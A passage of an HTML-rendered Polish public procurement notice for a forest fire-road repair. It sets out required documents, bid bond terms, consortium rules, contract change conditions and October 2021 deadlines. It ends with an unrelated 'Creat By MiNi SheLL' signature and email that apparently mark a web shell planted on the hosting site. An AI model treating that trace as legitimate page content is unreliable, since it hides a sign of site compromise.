inne<br/>podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnienie opisanego przez<br/>Zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.<br/>g) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za kontrolę jakości i kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, posiadanych uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu osób<br/>skierowanych przez wykonawcę do realizacji zamówienia stanowi załącznik nr 17 do SWZ),</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej<br/>Polskiej zamiast dokumentów:<br/>1) informacji z Krajowego Rejestru Karnego, o której mowa w pkt 7.1. lit. h) SWZ - składa<br/>informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny<br/>dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, w zakresie określonym art. 108 ust. 1 pkt 1,<br/>2 i 4, art. 109 ust. 1 pkt 2 lit a) i b) oraz pkt 3 PZP,<br/>2) zaświadczenia, o którym mowa w pkt 7.1. lit j), zaświadczenia albo innego dokumentu<br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne<br/>lub zdrowotne, o których mowa w pkt 7.1. lit k), lub odpisu albo informacji z Krajowego Rejestru<br/>Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa<br/>w pkt 7.1. lit l) - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma<br/>siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: (a) nie naruszył<br/>obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub<br/>zdrowotne, (b) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza<br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest<br/>zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej<br/>procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>7.4. Dokumenty, o których mowa w pkt 7.3. ppkt 1) i 2 lit (b), powinny być wystawione nie<br/>wcześniej niż 6 miesięcy przed ich złożeniem. Dokument, o którym mowa w pkt 7.3. ppkt 2 lit (a)<br/>powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>7.5. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt. 7.3., lub gdy dokumenty te nie odnoszą się do wszystkich<br/>przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 PZP, art. 109 ust. 1 pkt 1, 2 lit a) i b)<br/>PZP, zastępuje się je w całości lub w części dokumentem zawierającym odpowiednio<br/>oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji,<br/>lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed<br/>organem sądowym, administracyjnym albo organem samorządu zawodowego lub<br/>gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/>Postanowienia pkt. 7.4. stosuje się <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 9.1. Zamawiający wymaga wniesienia wadium w wysokości określonej poniżej: <br/>10 500 zł (słownie: dziesięć tysięcy pięćset złotych 00/100)<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do<br/>dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1<br/>pkt 2 i 3 oraz ust. 2 PZP. <br/>9.2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.:<br/>Dz. U. z 2020 r. poz. 299).9.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w banku PKO BP S.A. nr rachunku: 52 1020 5011 0000 9102 0230 3063 z<br/>dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na „Remont części drogi leśnej<br/>pożarowej nr 13- postępowanie nr 2”<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone<br/>na rachunku bankowym Zamawiającego. Wadium wniesione w pieniądzu Zamawiający<br/>przechowuje na rachunku bankowym. <br/>9.4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub<br/>poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać<br/>bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie<br/>związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>9.5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 9.2. ppkt 2)-4)<br/>należy przekazać Zamawiającemu wraz z Ofertą w oryginale <br/>w postaci elektronicznej. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą.<br/>Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub<br/>nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży<br/>wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie<br/>odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>9.6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego),<br/>gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz<br/>wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie<br/>przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty<br/>gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach<br/>określonych w art. 98 ust. 6 PZP.<br/>9.7. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu określone w pkt 6.1. powinni spełniać łącznie wszyscy Wykonawcy, z zastrzeżeniem, iż warunek opisany w pkt 6.1. ppkt 4) tiret<br/>pierwszy winien spełniać co najmniej jeden z tych Wykonawców. <br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są<br/>wymagane. W przypadku, o którym mowa w pkt 6.1. ppkt 4) SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <br/>W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum): <br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) Oświadczenie, o którym mowa w art. 125 ust. 1 PZP składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenia wykonawców wspólnie ubiegających się o udzielenie zamówienia powinny zostać złożone wraz z ofertą pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej, opatrzonej podpisemzaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 7.1. lit. h – l obowiązany będzie złożyć każdy z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 16.1. Projektowane postanowienia umowy w sprawie zamówienia publicznego zawiera wzór<br/>umowy stanowiący załącznik nr 11 do SWZ. <br/>16.2. Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty, na<br/>podstawie której dokonano wyboru Wykonawcy.<br/>Zmiany, o których mowa powyżej mogą zostać dokonane, jeżeli ich uzasadnieniem są niżej<br/>wymienione okoliczności:<br/>1) Zmiana terminu realizacji przedmiotu umowy spowodowana w szczególności:<br/>a) niekorzystnymi warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót<br/>budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów itp.; warunek będzie<br/>respektowany w przypadku rozpoczęcia prac i realizacji zgodnie z postanowieniami umowy oraz<br/>wykazaniem wpływu zaistnienia takich warunków na realizację robót;<br/>za niekorzystne warunki atmosferyczne przyjmuje się w szczególności:<br/>- klęski żywiołowe,<br/>- wystąpienie nietypowych dla klimatu polskiego warunków atmosferycznych odbiegających od<br/>typowych szczególnie niesprzyjających, uniemożliwiających prowadzenie zamówień/robót<br/>budowlanych zgodnie z technologią ich wykonania, przeprowadzanie prób i sprawdzeń,<br/>dokonywanie odbiorów, np. gradobicia, trąby powietrzne, zjawiska niestandardowe w klimacie<br/>polskim <br/>b) w razie wystąpienia awarii obiektów i urządzeń na terenie realizacji przedmiotu zamówienia,<br/>które wystąpiły z przyczyn niezależnych od Wykonawcy, a które uniemożliwiają prawidłowe<br/>wykonywanie prac<br/>c) koniecznością realizacji robót dodatkowych, która wpłynie na termin realizacji robót objętych przedmiotem umowy i która udokumentowana będzie zatwierdzonym protokołem konieczności,<br/>o czas niezbędny do realizacji robót dodatkowych,<br/>d) koniecznością wykonania robót, których wykonanie w sposób obiektywny uniemożliwia<br/>terminowe zakończenie realizacji przedmiotu umowy;<br/>e) w sytuacji konieczności wykonania robót zamiennych lub innych robót niezbędnych do<br/>wykonania przedmiotu umowy ze względu na zasady wiedzy technicznej oraz udzielenia<br/>zamówień dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu umowy,<br/>f) wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez<br/>inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,<br/>g) konieczności wprowadzenia zmian do dokumentacji projektowej, z przyczyn za które nie<br/>odpowiada Wykonawca,<br/>h) działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są<br/>konsekwencją winy którejkolwiek ze stron,<br/>i) wystąpienia opóźnień w dokonywaniu określonych czynności lub ich zaniechania przez<br/>właściwe organy administracji publicznej, które nie są następstwem okoliczności, za które<br/>Wykonawca ponosi odpowiedzialność,<br/>j) niemożności wykonywania robót z powodu braku dostępności do miejsc niezbędnych do ich<br/>wykonania z przyczyn niezawinionych przez Wykonawcę<br/>k) wstrzymaniem prac przez właściwe organy z przyczyn niezależnych od Wykonawcy;<br/>l) działania siły wyższej i klęsk żywiołowych mających bezpośredni wpływ na termin wykonania<br/>umowy,<br/>m) innymi przyczynami zewnętrznymi niezależnymi od Wykonawcy i Zamawiającego<br/>skutkującymi niemożliwością prowadzenia prac.<br/>2) Zmiana osoby pełniącej funkcję kierownika budowy/robót z ramienia Wykonawcy, wskazanej<br/>w ofercie Wykonawcy, na podstawie pkt. 6.1.4) SWZ może być dokonana w sytuacji:<br/>a) na wniosek Wykonawcy w przypadku:<br/> śmierci, choroby lub innego zdarzenia losowego,<br/> nienależytego wykonywania powierzonych prac przez Podwykonawcę,<br/> innych obiektywnych okoliczności niezależnych od Wykonawcy (np. rezygnacji).<br/>Uwaga: w przypadku zmiany ww. osoby, Wykonawca musi przedstawić kandydaturę innej osoby<br/>spełniającej warunki zawarte w SWZ i uzyskać zgodę Zamawiającego. <br/>3) Zmiana osoby pełniącej nadzór z ramienia Zamawiającego, może być dokonana <br/>w przypadku:<br/> śmierci, choroby lub innego zdarzenia losowego,<br/> nienależytego wykonywania powierzonych prac,<br/> innych obiektywnych okoliczności niezależnych od Zamawiającego (np. rezygnacji). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-11 09:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma JOSEPHINE https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-11 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> ,

Creat By MiNi SheLL
Email: jattceo@gmail.com